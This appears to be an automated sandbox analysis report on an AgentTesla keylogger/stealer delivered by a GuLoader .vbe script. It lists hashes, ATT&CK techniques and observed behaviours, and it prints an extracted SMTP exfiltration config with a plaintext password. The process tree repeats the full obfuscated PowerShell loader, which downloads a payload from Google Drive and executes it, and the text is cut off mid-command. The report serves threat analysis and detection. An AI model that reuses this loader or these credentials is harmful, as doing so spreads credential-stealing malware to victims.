agenttesla | ee2dea0f5362f6a3410bc8c9f199c740aee91971498aa77ffaf7eb546da7c957

General

Target

Justificante13087.vbe
Size

15KB
MD5

59743d96ff1e3796e18c6114bccadcf4
SHA1

524a31d5c9d8f25148024aae2cc1e28a8d83a1da
SHA256

ee2dea0f5362f6a3410bc8c9f199c740aee91971498aa77ffaf7eb546da7c957
SHA512

916ad151f03a72e105c5f2afcdf3ae1ef952d37b069045c2418c050a5d79907ac1e4d32c4b0b0f9ce1d6a0f0d99477fdc8a77b89e717ca7f270919051c3d617f
SSDEEP

384:QMVQ3GOmBsxCns4avBwx9ZzEC4FGJujI+PH:K39cs8sQnQC4Tjhf

Score

10^/10

agenttesla guloader discovery downloader execution keylogger spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
smtp.yandex.com
Port:
587
Username:
[email protected]
Password:
marcellinus360
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	1328	powershell.exe
7	1328	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1328	powershell.exe
2852	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
4	drive.google.com
5	drive.google.com
9	drive.google.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
17	api.ipify.org
18	api.ipify.org

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2732	wabmig.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2852	powershell.exe
2732	wabmig.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2852 set thread context of 2732	2852	powershell.exe	37

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wabmig.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2852	powershell.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
1328	powershell.exe
2852	powershell.exe
2852	powershell.exe
2732	wabmig.exe
2732	wabmig.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2852	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1328	powershell.exe
Token: SeDebugPrivilege	2852	powershell.exe
Token: SeDebugPrivilege	2732	wabmig.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2732	wabmig.exe

Suspicious use of WriteProcessMemory 23 IoCs

description	pid	Process	procid_target
PID 2400 wrote to memory of 1328	2400	WScript.exe	30
PID 2400 wrote to memory of 1328	2400	WScript.exe	30
PID 2400 wrote to memory of 1328	2400	WScript.exe	30
PID 1328 wrote to memory of 1972	1328	powershell.exe	32
PID 1328 wrote to memory of 1972	1328	powershell.exe	32
PID 1328 wrote to memory of 1972	1328	powershell.exe	32
PID 1328 wrote to memory of 2808	1328	powershell.exe	34
PID 1328 wrote to memory of 2808	1328	powershell.exe	34
PID 1328 wrote to memory of 2808	1328	powershell.exe	34
PID 2808 wrote to memory of 2852	2808	cmd.exe	35
PID 2808 wrote to memory of 2852	2808	cmd.exe	35
PID 2808 wrote to memory of 2852	2808	cmd.exe	35
PID 2808 wrote to memory of 2852	2808	cmd.exe	35
PID 2852 wrote to memory of 2536	2852	powershell.exe	36
PID 2852 wrote to memory of 2536	2852	powershell.exe	36
PID 2852 wrote to memory of 2536	2852	powershell.exe	36
PID 2852 wrote to memory of 2536	2852	powershell.exe	36
PID 2852 wrote to memory of 2732	2852	powershell.exe	37
PID 2852 wrote to memory of 2732	2852	powershell.exe	37
PID 2852 wrote to memory of 2732	2852	powershell.exe	37
PID 2852 wrote to memory of 2732	2852	powershell.exe	37
PID 2852 wrote to memory of 2732	2852	powershell.exe	37
PID 2852 wrote to memory of 2732	2852	powershell.exe	37

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Justificante13087.vbe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2400
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Udvikle Alderstillgget Oxyaphia Tretrinsraketters Unrepellable #>;$Unhusbandly128='Lgelfters224';<#Cardioid Tautophony Rytterskolers #>;$Slimsvampenendregnede=$host.PrivateData;If ($Slimsvampenendregnede) {$Ecuador++;}function Unencompassed170($hireable){$Sprrerne=$hireable.Length-$Ecuador;for( $Slimsvampene=4;$Slimsvampene -lt $Sprrerne;$Slimsvampene+=5){$Nonconjugality+=$hireable[$Slimsvampene];}$Nonconjugality;}function massively($Flyvermekaniker){ & ($Overproduced) ($Flyvermekaniker);}$Sprdstegte=Unencompassed170 'MelaMPensoTonnz U ciS ndlSkr lMateaUns /Res 5fo,h. B,g0,idd Isoh( nemWPlini UntnGar.dParto,apow.remsGlob FumbNVi.tTPill Fra 1 bom0Skib. J,c0Gasb;Stan ImplWNozziC.man ogs6 ks4 Til;Pter InspxUnex6Res 4.oek;Alat V drInduvMorg: Com1Te n2 ses1Tbru.Inap0Coag)Ryg SlavGPraneAveccDimikDorsoPryg/ Arb2Myoc0Vaeg1 Gab0Dove0Gi c1Arve0di.k1Nihi P.llF KapiApacr,vrmeB.vofInfaoTaksxClub/Hov 1 B.l2 Ath1Mora.Soli0 ,ry ';$Regeringsmagternes=Unencompassed170 'TrolUPavesBe rEPersRKurs-HjemA KlaGzygoE G unRu.dTU,ky ';$Haremets=Unencompassed170 'Justh KistInfotJermpD sts,egr: fr./ ing/Klodd D irEli i F iv Reje Oli.Eighg .rooKompo ArbgUnfelSubsel dy.UniacSprooHandmmuco/,rapuScatcFors?MateeBigbxk mip Slao Perr FritResi=Evand oro wirwLangn ReclRmebo P,aaBra d Uns&BestiSta d,ere=Udst1ScroENeute iseNEng,CAppaLCr sSYout8BundelimnWStaahkant3Tido0 .oeqLiqu2 OutEPresGEngl5beav4Oeno6Teac3,steQBru.Kbullq K poKidaXTilbxGejsDB,adbXyloO S ipKur.ADatacFort ';$Dumper=Unencompassed170 'derb>Imid ';$Overproduced=Unencompassed170 'heliiPolyeNondxI pa ';$Cremationist='Gennemkomponeret';$Efterlignelsernes = Unencompassed170 'TraneKok,cLar hBoomoKl,n Stok%.onaa,linpReckpDustdStana FaatBiocaapp,%Caus\PolyUOvernK.utfJokka,eltsEv.ucCar i D faChaet edePl sdJv h.SoutHRa.do Be.lRupp Skot& ens&Dame AllieprojcCubihCenooindi au,atE tu ';massively (Unencompassed170 'Sup $Hygig osalTopso Rekb Byga Osmlvk,t:SkueIVi.enEmasktimal Anvu FradDewoeBsnirPseui Ti nH,lmg BamsSejl=Krav(Vandc Be mEyold ho Foro/ RepcC dm Jyde$AnmeEsy kf Udtt SubeescrrFirmlGruniTracg ternAme,e A.olRembsMo.te St r.eurnSgene Au sXylo)tegn ');massively (Unencompassed170 'Wine$SouggZooll T koDendbDarwaprovl rin:w.teSVar e Afsl lopfElita Po.dSletjUniqoOrdai,kudn PsytWart=dana$ tipH Mawa MinrGveneAfbrm Asie istganosBifa.Befos Finp aalFucoiVasktKlar( ais$ arcDFodbu SammAfmap W re RecrSo i) nke ');massively (Unencompassed170 ' For[at aN sv.e inct Jos. S.mSProde henr F,gvNonsiFratc piueStroPRateonot,iphthnFiskt Re McotmaSkovn Stra S,rgInvaeHothrenth] Unr:K im:LogiSArase.atic ForuFor.r Anfi Mu tDyndyMe,aPflugrp.stoLsr t orsoPanhcDouboEremlelf Auth= ver Su e[ForsN Se e AnatLive.SoulSIncoeNonfcBemiu unnrSydai unetGithyS efPco.rr brso Ar t SynoS isc BonoBleplStanTAs ryOrnipA bae edr],uav:Mili:synbT WeslPolis Rek1H re2Vigi ');$Haremets=$Selfadjoint[0];$Gonystylaceae= (Unencompassed170 ' Pla$Fa bGorycLFiduOTilkB eelAVe,fL Bir:UnfrrBloce.tagg PonI,phiOD tmNU liAGaulL OctPDuciLFarvASinanG wdLTommG FejNFlseiReb NOxyrG KomS Eur=AlgonBegrE BomWOli -Thioo ,ntbKrreJ TureSta,cWhirTJo r PsorSPe,syUncisSkaktPaasETomeMR,fu. Mu.nRaphE TriT Soi. Gr,w BorECravb isuc KomL acei LecEGll,nAntiT');$Gonystylaceae+=$Inkluderings[1];massively ($Gonystylaceae);massively (Unencompassed170 'T ls$Ba dRIndfeLancg ge,iIsodoAlabnsostatraplFabrpN,vilkontaSteenBranlHapsgLutsnBonhiBa snPo tgDej sOf.e. InsHGarde Ufoa abdUdtoeReflrArbesTr k[Dben$GildRAfsleCrumgTil eCussrTekkiFestnGaffgPrebs AmbmTilkaParagU det ForeCrewrIritnSpeceUndesknog]Live=Inta$GravSafskp UnirTorud Scas Phot DiseToilgKatttBvlee Eso ');$Lurks=Unencompassed170 'Va,r$r spRLokae h vgTempiLii oUig nRorsa rikllabappsyklblybaPeran eol EucgP ranSkrni AffnBroogvi,cs ni. SulDUntaoBondwUndenStorl oloo Ho a estdIrreFMoskiStenl,leue Sig(Weig$SociH HypaHa.erAtomeDes mRubieS mlt Di sMidd,Selv$IncuMRandn Bu.dForbs ge)Isom ';$Mnds=$Inkluderings[0];massively (Unencompassed170 'Kain$ColeGWhicL TraoBarab EngA IdeL rai:StryS,upev HalRForbGGaneeRadi=Mags(BelltO,erESptmS UunTD se-Me.hpAsf.ALandtDepoHPol. Hypo$Bangm a.pNMetaDBepeS ili)Tops ');while (!$svrge) {massively (Unencompassed170 'Safr$BlodgP.thlSu eoBylabCardaYve lHay :OperS estr odmStadr Frek ngeInddrFalbnNepheSublsDril=Haar$AcrotAfbjr foruStvle F r ') ;massively $Lurks;massively (Unencompassed170 'ConsSPri t Briacamer SuptRu.b-Kno,S KomlG,skePa keSa,cpUkva Af.e4Remb ');massively (Unencompassed170 'Creb$Tee g DenlTreaoEli bspecaBli.lExse: MnssResmvLikvrTheogRepae nde= Re.(T ngTSemie chs dbat eut-br nPP,cka SpotIndehAtta .ynd$ nteM,ukknVen,dRevis Ske)Enkl ') ;massively (Unencompassed170 'unen$Un og.ynalmidgo Wicb.opyaBenzlbuck:PoodBBr sl ForaHalsdSativ Fjle,roorMis.dAndeeFamin OvesFrem= Ud,$indigUnful PenoSmaabVej aJebllInco:kla PgloruRisonNighkFyritLorekS,mmoUndimForum ConasaninRef dSndroF.leeNonvnEncosDich+ Mum+Resu% Hre$.iliSStuke t sl Bolf TeraT etdPo ajU.shoRockim,can antGrnt.In,sc Vido reouUskynPerttKlas ') ;$Haremets=$Selfadjoint[$Bladverdens];}$Phonopore=333284;$Udviklingsforlbene=27788;massively (Unencompassed170 'Feri$ PengUnsplPlymo .odbqui a AmplLben:To.sVS,ivi,ppll DebdUredtdobbjM,ljaGuldg,ruitRepr K.ni=Cau. ChalGEquieBesmtGlos-AsteC GjfoAmaln aktUnseePausn P.atE,el Svie$F rfM ensnGraadDe csElse ');massively (Unencompassed170 'snow$ TecgBurbl AbroHumibPreaaBorglC rp:TorsWFirsoKaprvP olenoncn tje Jeh=Ch c R.si[ tueSS umyFrsts Pent kteeSubtm uns.DrvtCAgg oRegunFjelvBl,ne sparCr ntPhot] Yut:Exho:PeelF JoerLvsaoHanemOverB Veda AflsEig eFord6sirp4fundS eictIndur xyqiHeftnUdstg Hex( G,u$He mVCirciTranlUdstdRipptRes,jForpaStatg nontNomi)Anes ');massively (Unencompassed170 ' Kap$ mydgLkkelClitoLumpbTroca SymlBrdf: ParNs ato Teln ladBa deStormgl.saSupenFangdKnigiTheon Oveg.iar Semi=Saba Fram[PaisSSk,tyIn osSu,et mpoeDuodm Ant. pomTRa ie Hebx Tilt er.C piE PlanBa nci loounpadS.geiS,xunxylogNull]J.nn:Beta:.lkeASt nSheteCpoliI amIRumo.Sp.nGDem e Bast PlaSUndmtD,sarVerdi BilnOp fgBark(A,om$PaisWMissoP euvDelrenysan Ti )Yett ');massively (Unencompassed170 ' erk$ThomgWivelbagmoTyrabMas aSjlelDecu: BliTCe av ChaaProln Deag LarsIndofrigsoKandr DidaGo dn ThysEvertStraa UnilChiltAfdenEcsti.lavnDiseg FersDoig=Cern$MellN StaoSpilnTusidOotseF,ilmCa,paBettnChird TeliH ndnS rigUdbi. lusP,atuO erbF its Spit kulrBesniForenLynggAf i( ag$ TabPPharhWanto indnschwoF.repLyseoOsterSurseMakr,Ud,y$ObsoU InsdCentv retiVicekTit lFr pi Ma nStikgY.misActlfRecuoTranrTrollBashb Ci e Su,n RubeTwib)Hver ');massively $Tvangsforanstaltnings;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1328
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Unfasciated.Hol && echo t"
    3⤵
    PID:1972
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Udvikle Alderstillgget Oxyaphia Tretrinsraketters Unrepellable #>;$Unhusbandly128='Lgelfters224';<#Cardioid Tautophony Rytterskolers #>;$Slimsvampenendregnede=$host.PrivateData;If ($Slimsvampenendregnede) {$Ecuador++;}function Unencompassed170($hireable){$Sprrerne=$hireable.Length-$Ecuador;for( $Slimsvampene=4;$Slimsvampene -lt $Sprrerne;$Slimsvampene+=5){$Nonconjugality+=$hireable[$Slimsvampene];}$Nonconjugality;}function massively($Flyvermekaniker){ & ($Overproduced) ($Flyvermekaniker);}$Sprdstegte=Unencompassed170 'MelaMPensoTonnz U ciS ndlSkr lMateaUns /Res 5fo,h. B,g0,idd Isoh( nemWPlini UntnGar.dParto,apow.remsGlob FumbNVi.tTPill Fra 1 bom0Skib. J,c0Gasb;Stan ImplWNozziC.man ogs6 ks4 Til;Pter InspxUnex6Res 4.oek;Alat V drInduvMorg: Com1Te n2 ses1Tbru.Inap0Coag)Ryg SlavGPraneAveccDimikDorsoPryg/ Arb2Myoc0Vaeg1 Gab0Dove0Gi c1Arve0di.k1Nihi P.llF KapiApacr,vrmeB.vofInfaoTaksxClub/Hov 1 B.l2 Ath1Mora.Soli0 ,ry ';$Regeringsmagternes=Unencompassed170 'TrolUPavesBe rEPersRKurs-HjemA KlaGzygoE G unRu.dTU,ky ';$Haremets=Unencompassed170 'Justh KistInfotJermpD sts,egr: fr./ ing/Klodd D irEli i F iv Reje Oli.Eighg .rooKompo ArbgUnfelSubsel dy.UniacSprooHandmmuco/,rapuScatcFors?MateeBigbxk mip Slao Perr FritResi=Evand oro wirwLangn ReclRmebo P,aaBra d Uns&BestiSta d,ere=Udst1ScroENeute iseNEng,CAppaLCr sSYout8BundelimnWStaahkant3Tido0 .oeqLiqu2 OutEPresGEngl5beav4Oeno6Teac3,steQBru.Kbullq K poKidaXTilbxGejsDB,adbXyloO S ipKur.ADatacFort ';$Dumper=Unencompassed170 'derb>Imid ';$Overproduced=Unencompassed170 'heliiPolyeNondxI pa ';$Cremationist='Gennemkomponeret';$Efterlignelsernes = Unencompassed170 'TraneKok,cLar hBoomoKl,n Stok%.onaa,linpReckpDustdStana FaatBiocaapp,%Caus\PolyUOvernK.utfJokka,eltsEv.ucCar i D faChaet edePl sdJv h.SoutHRa.do Be.lRupp Skot& ens&Dame AllieprojcCubihCenooindi au,atE tu ';massively (Unencompassed170 'Sup $Hygig osalTopso Rekb Byga Osmlvk,t:SkueIVi.enEmasktimal Anvu FradDewoeBsnirPseui Ti nH,lmg BamsSejl=Krav(Vandc Be mEyold ho Foro/ RepcC dm Jyde$AnmeEsy kf Udtt SubeescrrFirmlGruniTracg ternAme,e A.olRembsMo.te St r.eurnSgene Au sXylo)tegn ');massively (Unencompassed170 'Wine$SouggZooll T koDendbDarwaprovl rin:w.teSVar e Afsl lopfElita Po.dSletjUniqoOrdai,kudn PsytWart=dana$ tipH Mawa MinrGveneAfbrm Asie istganosBifa.Befos Finp aalFucoiVasktKlar( ais$ arcDFodbu SammAfmap W re RecrSo i) nke ');massively (Unencompassed170 ' For[at aN sv.e inct Jos. S.mSProde henr F,gvNonsiFratc piueStroPRateonot,iphthnFiskt Re McotmaSkovn Stra S,rgInvaeHothrenth] Unr:K im:LogiSArase.atic ForuFor.r Anfi Mu tDyndyMe,aPflugrp.stoLsr t orsoPanhcDouboEremlelf Auth= ver Su e[ForsN Se e AnatLive.SoulSIncoeNonfcBemiu unnrSydai unetGithyS efPco.rr brso Ar t SynoS isc BonoBleplStanTAs ryOrnipA bae edr],uav:Mili:synbT WeslPolis Rek1H re2Vigi ');$Haremets=$Selfadjoint[0];$Gonystylaceae= (Unencompassed170 ' Pla$Fa bGorycLFiduOTilkB eelAVe,fL Bir:UnfrrBloce.tagg PonI,phiOD tmNU liAGaulL OctPDuciLFarvASinanG wdLTommG FejNFlseiReb NOxyrG KomS Eur=AlgonBegrE BomWOli -Thioo ,ntbKrreJ TureSta,cWhirTJo r PsorSPe,syUncisSkaktPaasETomeMR,fu. Mu.nRaphE TriT Soi. Gr,w BorECravb isuc KomL acei LecEGll,nAntiT');$Gonystylaceae+=$Inkluderings[1];massively ($Gonystylaceae);massively (Unencompassed170 'T ls$Ba dRIndfeLancg ge,iIsodoAlabnsostatraplFabrpN,vilkontaSteenBranlHapsgLutsnBonhiBa snPo tgDej sOf.e. InsHGarde Ufoa abdUdtoeReflrArbesTr k[Dben$GildRAfsleCrumgTil eCussrTekkiFestnGaffgPrebs AmbmTilkaParagU det ForeCrewrIritnSpeceUndesknog]Live=Inta$GravSafskp UnirTorud Scas Phot DiseToilgKatttBvlee Eso ');$Lurks=Unencompassed170 'Va,r$r spRLokae h vgTempiLii oUig nRorsa rikllabappsyklblybaPeran eol EucgP ranSkrni AffnBroogvi,cs ni. SulDUntaoBondwUndenStorl oloo Ho a estdIrreFMoskiStenl,leue Sig(Weig$SociH HypaHa.erAtomeDes mRubieS mlt Di sMidd,Selv$IncuMRandn Bu.dForbs ge)Isom ';$Mnds=$Inkluderings[0];massively (Unencompassed170 'Kain$ColeGWhicL TraoBarab EngA IdeL rai:StryS,upev HalRForbGGaneeRadi=Mags(BelltO,erESptmS UunTD se-Me.hpAsf.ALandtDepoHPol. Hypo$Bangm a.pNMetaDBepeS ili)Tops ');while (!$svrge) {massively (Unencompassed170 'Safr$BlodgP.thlSu eoBylabCardaYve lHay :OperS estr odmStadr Frek ngeInddrFalbnNepheSublsDril=Haar$AcrotAfbjr foruStvle F r ') ;massively $Lurks;massively (Unencompassed170 'ConsSPri t Briacamer SuptRu.b-Kno,S KomlG,skePa keSa,cpUkva Af.e4Remb ');massively (Unencompassed170 'Creb$Tee g DenlTreaoEli bspecaBli.lExse: MnssResmvLikvrTheogRepae nde= Re.(T ngTSemie chs dbat eut-br nPP,cka SpotIndehAtta .ynd$ nteM,ukknVen,dRevis Ske)Enkl ') ;massively (Unencompassed170 'unen$Un og.ynalmidgo Wicb.opyaBenzlbuck:PoodBBr sl ForaHalsdSativ Fjle,roorMis.dAndeeFamin OvesFrem= Ud,$indigUnful PenoSmaabVej aJebllInco:kla PgloruRisonNighkFyritLorekS,mmoUndimForum ConasaninRef dSndroF.leeNonvnEncosDich+ Mum+Resu% Hre$.iliSStuke t sl Bolf TeraT etdPo ajU.shoRockim,can antGrnt.In,sc Vido reouUskynPerttKlas ') ;$Haremets=$Selfadjoint[$Bladverdens];}$Phonopore=333284;$Udviklingsforlbene=27788;massively (Unencompassed170 'Feri$ PengUnsplPlymo .odbqui a AmplLben:To.sVS,ivi,ppll DebdUredtdobbjM,ljaGuldg,ruitRepr K.ni=Cau. ChalGEquieBesmtGlos-AsteC GjfoAmaln aktUnseePausn P.atE,el Svie$F rfM ensnGraadDe csElse ');massively (Unencompassed170 'snow$ TecgBurbl AbroHumibPreaaBorglC rp:TorsWFirsoKaprvP olenoncn tje Jeh=Ch c R.si[ tueSS umyFrsts Pent kteeSubtm uns.DrvtCAgg oRegunFjelvBl,ne sparCr ntPhot] Yut:Exho:PeelF JoerLvsaoHanemOverB Veda AflsEig eFord6sirp4fundS eictIndur xyqiHeftnUdstg Hex( G,u$He mVCirciTranlUdstdRipptRes,jForpaStatg nontNomi)Anes ');massively (Unencompassed170 ' Kap$ mydgLkkelClitoLumpbTroca SymlBrdf: ParNs ato Teln ladBa deStormgl.saSupenFangdKnigiTheon Oveg.iar Semi=Saba Fram[PaisSSk,tyIn osSu,et mpoeDuodm Ant. pomTRa ie Hebx Tilt er.C piE PlanBa nci loounpadS.geiS,xunxylogNull]J.nn:Beta:.lkeASt nSheteCpoliI amIRumo.Sp.nGDem e Bast PlaSUndmtD,sarVerdi BilnOp fgBark(A,om$PaisWMissoP euvDelrenysan Ti )Yett ');massively (Unencompassed170 ' erk$ThomgWivelbagmoTyrabMas aSjlelDecu: BliTCe av ChaaProln Deag LarsIndofrigsoKandr DidaGo dn ThysEvertStraa UnilChiltAfdenEcsti.lavnDiseg FersDoig=Cern$MellN StaoSpilnTusidOotseF,ilmCa,paBettnChird TeliH ndnS rigUdbi. lusP,atuO erbF its Spit kulrBesniForenLynggAf i( ag$ TabPPharhWanto indnschwoF.repLyseoOsterSurseMakr,Ud,y$ObsoU InsdCentv retiVicekTit lFr pi Ma nStikgY.misActlfRecuoTranrTrollBashb Ci e Su,n RubeTwib)Hver ');massively $Tvangsforanstaltnings;"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2808
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Udvikle Alderstillgget Oxyaphia Tretrinsraketters Unrepellable #>;$Unhusbandly128='Lgelfters224';<#Cardioid Tautophony Rytterskolers #>;$Slimsvampenendregnede=$host.PrivateData;If ($Slimsvampenendregnede) {$Ecuador++;}function Unencompassed170($hireable){$Sprrerne=$hireable.Length-$Ecuador;for( $Slimsvampene=4;$Slimsvampene -lt $Sprrerne;$Slimsvampene+=5){$Nonconjugality+=$hireable[$Slimsvampene];}$Nonconjugality;}function massively($Flyvermekaniker){ & ($Overproduced) ($Flyvermekaniker);}$Sprdstegte=Unencompassed170 'MelaMPensoTonnz U ciS ndlSkr lMateaUns /Res 5fo,h. B,g0,idd Isoh( nemWPlini UntnGar.dParto,apow.remsGlob FumbNVi.tTPill Fra 1 bom0Skib. J,c0Gasb;Stan ImplWNozziC.man ogs6 ks4 Til;Pter InspxUnex6Res 4.oek;Alat V drInduvMorg: Com1Te n2 ses1Tbru.Inap0Coag)Ryg SlavGPraneAveccDimikDorsoPryg/ Arb2Myoc0Vaeg1 Gab0Dove0Gi c1Arve0di.k1Nihi P.llF KapiApacr,vrmeB.vofInfaoTaksxClub/Hov 1 B.l2 Ath1Mora.Soli0 ,ry ';$Regeringsmagternes=Unencompassed170 'TrolUPavesBe rEPersRKurs-HjemA KlaGzygoE G unRu.dTU,ky ';$Haremets=Unencompassed170 'Justh KistInfotJermpD sts,egr: fr./ ing/Klodd D irEli i F iv Reje Oli.Eighg .rooKompo ArbgUnfelSubsel dy.UniacSprooHandmmuco/,rapuScatcFors?MateeBigbxk mip Slao Perr FritResi=Evand oro wirwLangn ReclRmebo P,aaBra d Uns&BestiSta d,ere=Udst1ScroENeute iseNEng,CAppaLCr sSYout8BundelimnWStaahkant3Tido0 .oeqLiqu2 OutEPresGEngl5beav4Oeno6Teac3,steQBru.Kbullq K poKidaXTilbxGejsDB,adbXyloO S ipKur.ADatacFort ';$Dumper=Unencompassed170 'derb>Imid ';$Overproduced=Unencompassed170 'heliiPolyeNondxI pa ';$Cremationist='Gennemkomponeret';$Efterlignelsernes = Unencompassed170 'TraneKok,cLar hBoomoKl,n Stok%.onaa,linpReckpDustdStana FaatBiocaapp,%Caus\PolyUOvernK.utfJokka,eltsEv.ucCar i D faChaet edePl sdJv h.SoutHRa.do Be.lRupp Skot& ens&Dame AllieprojcCubihCenooindi au,atE tu ';massively (Unencompassed170 'Sup $Hygig osalTopso Rekb Byga Osmlvk,t:SkueIVi.enEmasktimal Anvu FradDewoeBsnirPseui Ti nH,lmg BamsSejl=Krav(Vandc Be mEyold ho Foro/ RepcC dm Jyde$AnmeEsy kf Udtt SubeescrrFirmlGruniTracg ternAme,e A.olRembsMo.te St r.eurnSgene Au sXylo)tegn ');massively (Unencompassed170 'Wine$SouggZooll T koDendbDarwaprovl rin:w.teSVar e Afsl lopfElita Po.dSletjUniqoOrdai,kudn PsytWart=dana$ tipH Mawa MinrGveneAfbrm Asie istganosBifa.Befos Finp aalFucoiVasktKlar( ais$ arcDFodbu SammAfmap W re RecrSo i) nke ');massively (Unencompassed170 ' For[at aN sv.e inct Jos. S.mSProde henr F,gvNonsiFratc piueStroPRateonot,iphthnFiskt Re McotmaSkovn Stra S,rgInvaeHothrenth] Unr:K im:LogiSArase.atic ForuFor.r Anfi Mu tDyndyMe,aPflugrp.stoLsr t orsoPanhcDouboEremlelf Auth= ver Su e[ForsN Se e AnatLive.SoulSIncoeNonfcBemiu unnrSydai unetGithyS efPco.rr brso Ar t SynoS isc BonoBleplStanTAs ryOrnipA bae edr],uav:Mili:synbT WeslPolis Rek1H re2Vigi ');$Haremets=$Selfadjoint[0];$Gonystylaceae= (Unencompassed170 ' Pla$Fa bGorycLFiduOTilkB eelAVe,fL Bir:UnfrrBloce.tagg PonI,phiOD tmNU liAGaulL OctPDuciLFarvASinanG wdLTommG FejNFlseiReb NOxyrG KomS Eur=AlgonBegrE BomWOli -Thioo ,ntbKrreJ TureSta,cWhirTJo r PsorSPe,syUncisSkaktPaasETomeMR,fu. Mu.nRaphE TriT Soi. Gr,w BorECravb isuc KomL acei LecEGll,nAntiT');$Gonystylaceae+=$Inkluderings[1];massively ($Gonystylaceae);massively (Unencompassed170 'T ls$Ba dRIndfeLancg ge,iIsodoAlabnsostatraplFabrpN,vilkontaSteenBranlHapsgLutsnBonhiBa snPo tgDej sOf.e. InsHGarde Ufoa abdUdtoeReflrArbesTr k[Dben$GildRAfsleCrumgTil eCussrTekkiFestnGaffgPrebs AmbmTilkaParagU det ForeCrewrIritnSpeceUndesknog]Live=Inta$GravSafskp UnirTorud Scas Phot DiseToilgKatttBvlee Eso ');$Lurks=Unencompassed170 'Va,r$r spRLokae h vgTempiLii oUig nRorsa rikllabappsyklblybaPeran eol EucgP ranSkrni AffnBroogvi,cs ni. SulDUntaoBondwUndenStorl oloo Ho a estdIrreFMoskiStenl,leue Sig(Weig$SociH HypaHa.erAtomeDes mRubieS mlt Di sMidd,Selv$IncuMRandn Bu.dForbs ge)Isom ';$Mnds=$Inkluderings[0];massively (Unencompassed170 'Kain$ColeGWhicL TraoBarab EngA IdeL rai:StryS,upev HalRForbGGaneeRadi=Mags(BelltO,erESptmS UunTD se-Me.hpAsf.ALandtDepoHPol. Hypo$Bangm a.pNMetaDBepeS ili)Tops ');while (!$svrge) {massively (Unencompassed170 'Safr$BlodgP.thlSu eoBylabCardaYve lHay :OperS estr odmStadr Frek ngeInddrFalbnNepheSublsDril=Haar$AcrotAfbjr foruStvle F r ') ;massively $Lurks;massively (Unencompassed170 'ConsSPri t Briacamer SuptRu.b-Kno,S KomlG,skePa keSa,cpUkva Af.e4Remb ');massively (Unencompassed170 'Creb$Tee g DenlTreaoEli bspecaBli.lExse: MnssResmvLikvrTheogRepae nde= Re.(T ngTSemie chs dbat eut-br nPP,cka SpotIndehAtta .ynd$ nteM,ukknVen,dRevis Ske)Enkl ') ;massively (Unencompassed170 'unen$Un og.ynalmidgo Wicb.opyaBenzlbuck:PoodBBr sl ForaHalsdSativ Fjle,roorMis.dAndeeFamin OvesFrem= Ud,$indigUnful PenoSmaabVej aJebllInco:kla PgloruRisonNighkFyritLorekS,mmoUndimForum ConasaninRef dSndroF.leeNonvnEncosDich+ Mum+Resu% Hre$.iliSStuke t sl Bolf TeraT etdPo ajU.shoRockim,can antGrnt.In,sc Vido reouUskynPerttKlas ') ;$Haremets=$Selfadjoint[$Bladverdens];}$Phonopore=333284;$Udviklingsforlbene=27788;massively (Unencompassed170 'Feri$ PengUnsplPlymo .odbqui a AmplLben:To.sVS,ivi,ppll DebdUredtdobbjM,ljaGuldg,ruitRepr K.ni=Cau. ChalGEquieBesmtGlos-AsteC GjfoAmaln aktUnseePausn P.atE,el Svie$F rfM ensnGraadDe csElse ');massively (Unencompassed170 'snow$ TecgBurbl AbroHumibPreaaBorglC rp:TorsWFirsoKaprvP olenoncn tje Jeh=Ch c R.si[ tueSS umyFrsts Pent kteeSubtm uns.DrvtCAgg oRegunFjelvBl,ne sparCr ntPhot] Yut:Exho:PeelF JoerLvsaoHanemOverB Veda AflsEig eFord6sirp4fundS eictIndur xyqiHeftnUdstg Hex( G,u$He mVCirciTranlUdstdRipptRes,jForpaStatg nontNomi)Anes ');massively (Unencompassed170 ' Kap$ mydgLkkelClitoLumpbTroca SymlBrdf: ParNs ato Teln ladBa deStormgl.saSupenFangdKnigiTheon Oveg.iar 